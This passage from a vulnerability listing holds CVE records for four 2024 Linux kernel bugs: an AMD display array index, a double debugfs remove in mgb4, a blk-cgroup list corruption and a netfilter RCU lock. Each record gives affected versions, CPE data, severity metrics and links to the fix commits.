                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Skip finding free audio for unknown engine_id\n\n[WHY]\nENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it\nalso means it is uninitialized and does not need free audio.\n\n[HOW]\nSkip and return NULL.\n\nThis fixes 2 OVERRUN issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:19:56.516Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
        },
        {
          "url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
        },
        {
          "url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
        },
        {
          "url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
        },
        {
          "url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
        },
        {
          "url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
        }
      ],
      "title": "drm/amd/display: Skip finding free audio for unknown engine_id",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42119",
    "datePublished": "2024-07-30T07:46:11.314Z",
    "dateReserved": "2024-07-29T15:50:41.178Z",
    "dateUpdated": "2025-11-03T22:01:51.528Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39465 (GCVE-0-2024-39465)

Vulnerability from cvelistv5 – Published: 2024-06-25 14:25 – Updated: 2025-05-04 09:16

Title

media: mgb4: Fix double debugfs remove

Summary

In the Linux kernel, the following vulnerability has been resolved: media: mgb4: Fix double debugfs remove Fixes an error where debugfs_remove_recursive() is called first on a parent directory and then again on a child which causes a kernel panic. [hverkuil: added Fixes/Cc tags]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/252204b634efffd8b…
	https://git.kernel.org/stable/c/825fc49497957310e…

Impacted products

Vendor

Product

Version

Linux

Affected: 0ab13674a9bd10514486cf1670d71dbd8afec421 , < 252204b634efffd8b167d77413c93d0192aaf5f6 (git)
Affected: 0ab13674a9bd10514486cf1670d71dbd8afec421 , < 825fc49497957310e421454fe3fb8b8d8d8e2dd2 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.567Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/252204b634efffd8b167d77413c93d0192aaf5f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/825fc49497957310e421454fe3fb8b8d8d8e2dd2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39465",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:08:01.951646Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:42.031Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/pci/mgb4/mgb4_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "252204b634efffd8b167d77413c93d0192aaf5f6",
              "status": "affected",
              "version": "0ab13674a9bd10514486cf1670d71dbd8afec421",
              "versionType": "git"
            },
            {
              "lessThan": "825fc49497957310e421454fe3fb8b8d8d8e2dd2",
              "status": "affected",
              "version": "0ab13674a9bd10514486cf1670d71dbd8afec421",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/pci/mgb4/mgb4_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mgb4: Fix double debugfs remove\n\nFixes an error where debugfs_remove_recursive() is called first on a parent\ndirectory and then again on a child which causes a kernel panic.\n\n[hverkuil: added Fixes/Cc tags]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:23.668Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/252204b634efffd8b167d77413c93d0192aaf5f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/825fc49497957310e421454fe3fb8b8d8d8e2dd2"
        }
      ],
      "title": "media: mgb4: Fix double debugfs remove",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39465",
    "datePublished": "2024-06-25T14:25:04.237Z",
    "dateReserved": "2024-06-25T14:23:23.744Z",
    "dateUpdated": "2025-05-04T09:16:23.668Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38384 (GCVE-0-2024-38384)

Vulnerability from cvelistv5 – Published: 2024-06-24 13:50 – Updated: 2025-05-04 09:13

Title

blk-cgroup: fix list corruption from reorder of WRITE ->lqueued

Summary

In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: fix list corruption from reorder of WRITE ->lqueued __blkcg_rstat_flush() can be run anytime, especially when blk_cgroup_bio_start is being executed. If WRITE of `->lqueued` is re-ordered with READ of 'bisc->lnode.next' in the loop of __blkcg_rstat_flush(), `next_bisc` can be assigned with one stat instance being added in blk_cgroup_bio_start(), then the local list in __blkcg_rstat_flush() could be corrupted. Fix the issue by adding one barrier.

Severity ?

8.4 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/714e59b5456e4d6e4…
	https://git.kernel.org/stable/c/785298ab6b802afa7…
	https://git.kernel.org/stable/c/d0aac2363549e12cc…

Impacted products

Vendor

Product

Version

Linux

Affected: 3b8cc6298724021da845f2f9fd7dd4b6829a6817 , < 714e59b5456e4d6e4295a9968c564abe193f461c (git)
Affected: 3b8cc6298724021da845f2f9fd7dd4b6829a6817 , < 785298ab6b802afa75089239266b6bbea590809c (git)
Affected: 3b8cc6298724021da845f2f9fd7dd4b6829a6817 , < d0aac2363549e12cc79b8e285f13d5a9f42fd08e (git)

Linux

Affected: 6.2
Unaffected: 0 , < 6.2 (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "714e59b5456e",
                "status": "affected",
                "version": "3b8cc6298724",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "785298ab6b80",
                "status": "affected",
                "version": "3b8cc6298724",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "d0aac2363549",
                "status": "affected",
                "version": "3b8cc6298724",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "6.2"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.2",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.33",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.10",
                "status": "unaffected",
                "version": "6.9.4",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.10-rc1"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 8.4,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38384",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-25T13:27:38.979262Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-400",
                "description": "CWE-400 Uncontrolled Resource Consumption",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-25T13:37:27.542Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:04:25.142Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/714e59b5456e4d6e4295a9968c564abe193f461c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/785298ab6b802afa75089239266b6bbea590809c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0aac2363549e12cc79b8e285f13d5a9f42fd08e"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "block/blk-cgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "714e59b5456e4d6e4295a9968c564abe193f461c",
              "status": "affected",
              "version": "3b8cc6298724021da845f2f9fd7dd4b6829a6817",
              "versionType": "git"
            },
            {
              "lessThan": "785298ab6b802afa75089239266b6bbea590809c",
              "status": "affected",
              "version": "3b8cc6298724021da845f2f9fd7dd4b6829a6817",
              "versionType": "git"
            },
            {
              "lessThan": "d0aac2363549e12cc79b8e285f13d5a9f42fd08e",
              "status": "affected",
              "version": "3b8cc6298724021da845f2f9fd7dd4b6829a6817",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "block/blk-cgroup.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.2"
            },
            {
              "lessThan": "6.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix list corruption from reorder of WRITE -\u003elqueued\n\n__blkcg_rstat_flush() can be run anytime, especially when blk_cgroup_bio_start\nis being executed.\n\nIf WRITE of `-\u003elqueued` is re-ordered with READ of \u0027bisc-\u003elnode.next\u0027 in\nthe loop of __blkcg_rstat_flush(), `next_bisc` can be assigned with one\nstat instance being added in blk_cgroup_bio_start(), then the local\nlist in __blkcg_rstat_flush() could be corrupted.\n\nFix the issue by adding one barrier."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:26.836Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/714e59b5456e4d6e4295a9968c564abe193f461c"
        },
        {
          "url": "https://git.kernel.org/stable/c/785298ab6b802afa75089239266b6bbea590809c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0aac2363549e12cc79b8e285f13d5a9f42fd08e"
        }
      ],
      "title": "blk-cgroup: fix list corruption from reorder of WRITE -\u003elqueued",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38384",
    "datePublished": "2024-06-24T13:50:51.033Z",
    "dateReserved": "2024-06-21T11:16:40.612Z",
    "dateUpdated": "2025-05-04T09:13:26.836Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36286 (GCVE-0-2024-36286)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-04 17:21

Title

netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu() syzbot reported that nf_reinject() could be called without rcu_read_lock() : WARNING: suspicious RCU usage 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted net/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 2 locks held by syz-executor.4/13427: #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline] #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline] #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471 #1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline] #1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline] #1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172 stack backtrace: CPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024 Call Trace: <IRQ> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114 lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712 nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline] nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397 nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline] instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172 rcu_do_batch kernel/rcu/tree.c:2196 [inline] rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471 handle_softirqs+0x2d6/0x990 kernel/softirq.c:554 __do_softirq kernel/softirq.c:588 [inline] invoke_softirq kernel/softirq.c:428 [inline] __irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637 irq_exit_rcu+0x9/0x30 kernel/softirq.c:649 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline] sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043 </IRQ> <TASK>

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8658bd777cbfcb0c1…
	https://git.kernel.org/stable/c/3989b817857f4890f…
	https://git.kernel.org/stable/c/e01065b339e323b3d…
	https://git.kernel.org/stable/c/25ea5377e3d2921a0…
	https://git.kernel.org/stable/c/68f40354a3851df46…
	https://git.kernel.org/stable/c/8f365564af898819a…
	https://git.kernel.org/stable/c/215df6490e208bfdd…
	https://git.kernel.org/stable/c/dc21c6cc3d6986d93…

Impacted products

Vendor

Product

Version

Linux

Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 8658bd777cbfcb0c13df23d0ea120e70517761b9 (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 3989b817857f4890fab9379221a9d3f52bf5c256 (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < e01065b339e323b3dfa1be217fd89e9b3208b0ab (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 25ea5377e3d2921a0f96ae2551f5ab1b36825dd4 (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 68f40354a3851df46c27be96b84f11ae193e36c5 (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 8f365564af898819a523f1a8cf5c6ce053e9f718 (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < 215df6490e208bfdd5b3012f5075e7f8736f3e7a (git)
Affected: 9872bec773c2e8503fec480c1e8a0c732517e257 , < dc21c6cc3d6986d938efbf95de62473982c98dec (git)

Linux

Affected: 2.6.25
Unaffected: 0 , < 2.6.25 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:08.764Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36286",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:09:34.720987Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:45.892Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nfnetlink_queue.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8658bd777cbfcb0c13df23d0ea120e70517761b9",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "3989b817857f4890fab9379221a9d3f52bf5c256",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "e01065b339e323b3dfa1be217fd89e9b3208b0ab",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "25ea5377e3d2921a0f96ae2551f5ab1b36825dd4",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "68f40354a3851df46c27be96b84f11ae193e36c5",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "8f365564af898819a523f1a8cf5c6ce053e9f718",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "215df6490e208bfdd5b3012f5075e7f8736f3e7a",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            },
            {
              "lessThan": "dc21c6cc3d6986d938efbf95de62473982c98dec",
              "status": "affected",
              "version": "9872bec773c2e8503fec480c1e8a0c732517e257",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nfnetlink_queue.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.25"
            },
            {
              "lessThan": "2.6.25",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
